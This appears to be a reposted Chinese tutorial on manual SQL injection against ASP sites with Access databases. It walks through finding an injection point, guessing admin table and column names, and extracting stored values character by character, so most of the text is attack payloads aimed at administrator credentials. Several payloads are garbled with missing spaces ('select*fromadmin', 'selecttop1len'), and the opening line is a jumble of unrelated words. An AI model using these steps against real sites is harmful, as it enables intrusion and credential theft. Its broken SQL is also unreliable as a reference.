数据 字段长度 最终 logs color str 末尾 class
SQL 注入原理 手工注入 access 数据库
SQL 注入是通过将 SQL 命令插入到 web 表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意 SQL 指令的目的。
1. 判断网站是否有注入点。
在以 asp?id=xx(任意数字)结尾的连接依次添加:
- '
- 1=1
- 1=2
若以上结果显示 "数据库出错","正常显示","数据库出错" 则该网站存在注入点。
2. 猜解表名
在链接末尾添加语句:
- and exists(select*fromadmin)
若存在表名为 admin 的表,则上述式返回 true,即页面正常显示。
3. 猜解列名
在链接末尾添加语句:
- and exists(selectadminfromadmin)
若 admin 表中存在名为 admin 的列,则上述式返回 true,即页面正常显示。
同理,检测表中是否存在名为 password 的列。
4. 猜测字段内容
- and (selecttop1len(admin)fromadmin)>n
若页面正常显示,则字段长度大于 n。
- and (selecttop1asc(mid(admin,1,1))fromadmin)>c
若页面正常显示,则第一条记录的第一个字符的 ASCII 码大于 c。
SQL 注入原理 手工注入 access 数据库
来源: http://www.bubuko.com/infodetail-2049703.html